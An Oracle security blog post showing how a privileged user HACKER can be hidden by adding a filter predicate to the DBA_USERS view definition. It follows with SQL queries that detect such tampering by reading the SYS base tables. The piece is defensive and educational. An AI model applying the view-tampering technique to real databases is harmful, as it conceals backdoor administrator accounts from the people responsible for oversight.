Coskan’s Approach to Oracle

January 29, 2007

What if DBA views are not reliable ??

Filed under: Security — coskan @ 12:13 pm

Suppose that you are the DBA of a big corporation with many DB users.

One day you query v$session and see a username HACKER.

Who is this?

First you look in Toad and see nothing about user HACKER.

Then you query dba_users

and you see nothing about user HACKER.

Where did this user come from? Why can't you see him?

The answer is below.
13:04:40 SQL> create user hacker identified by hacker;

User created.

13:05:50 SQL> grant create session to hacker;

Grant succeeded.

13:05:58 SQL> grant dba to hacker;

Grant succeeded.

13:12:33 SQL> select username from dba_users where username='HACKER';

no rows selected


13:14:23 SQL> select name from user$ where name = 'HACKER';


1 row selected.

The answer can be read between the lines of the DBA_USERS view definition, which has been altered. The last predicate is not part of the stock view text:

select u.name, u.user#, u.password, m.status,
decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime,
8, u.ltime, 9, u.ltime, 10, u.ltime, to_date(NULL)),
decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
6, u.exptime, 9, u.exptime, 10, u.exptime,
decode(u.ptime, '', to_date(NULL),
decode(pr.limit#, 2147483647, to_date(NULL),
decode(pr.limit#, 0,
decode(dp.limit#, 2147483647, to_date(NULL), u.ptime +
dp.limit#/86400),
u.ptime + pr.limit#/86400)))),
dts.name, tts.name, u.ctime, p.name,
nvl(cgm.consumer_group, 'DEFAULT_CONSUMER_GROUP'),
u.ext_username
from sys.user$ u left outer join sys.resource_group_mapping$ cgm
on (cgm.attribute = 'ORACLE_USER' and cgm.status = 'ACTIVE' and
cgm.value = u.name),
sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
where u.datats# = dts.ts#
and u.resource$ = p.profile#
and u.tempts# = tts.ts#
and u.astatus = m.status#
and u.type# = 1
and u.resource$ = pr.profile#
and dp.profile# = 0
and dp.type#=1
and dp.resource#=1
and pr.type# = 1
and pr.resource# = 1
-- extra predicate: the HACKER row in sys.user$ never reaches the view
and u.name <> 'HACKER'

Thanks to Steve Callan for informing us about the situation above.

What I have learned today:

If you want to be a real DBA, look behind the VIEWS.
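One way to look behind the views, as an added example that is not part of the original post: these checks read the SYS base tables directly and compare them with what DBA_USERS and V$SESSION report. They assume a SQL*Plus session connected as SYS (or an account with SELECT on sys.user$, sys.obj$ and sys.view$) on a release of the same era as the post.

```sql
-- Added example, not from the original post. Run as SYS in SQL*Plus.
set long 20000 linesize 200 pagesize 100

-- 1. Accounts present in the base table but filtered out by the view.
--    type# = 1 is a user (0 is a role). An untampered view returns no rows.
select u.name, u.user#, u.ctime
  from sys.user$ u
 where u.type# = 1
minus
select d.username, d.user_id, d.created
  from dba_users d;

-- 2. Live sessions whose owner DBA_USERS does not know about.
select s.sid, s.serial#, s.username, s.machine, s.program, s.logon_time
  from v$session s
 where s.username is not null
   and not exists (select 1
                     from dba_users d
                    where d.username = s.username);

-- 3. When the view was created and last modified, read from sys.obj$
--    rather than DBA_OBJECTS (itself a view). owner# = 0 is SYS,
--    type# = 4 is a view. Compare mtime with the install/patch dates.
select o.name, o.ctime, o.mtime, o.stime
  from sys.obj$ o
 where o.owner# = 0
   and o.type# = 4
   and o.name = 'DBA_USERS';

-- 4. The stored view text itself. Diff this against the definition
--    shipped in $ORACLE_HOME/rdbms/admin/catalog.sql or against a
--    known-good database of the same version and patch level.
select v.textlength, v.text
  from sys.view$ v, sys.obj$ o
 where v.obj# = o.obj#
   and o.owner# = 0
   and o.type# = 4
   and o.name = 'DBA_USERS';
```

Any row from query 1 or 2, or an mtime in query 3 that does not match a known patch window, is a reason to diff the text from query 4 line by line.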

Security Comes First
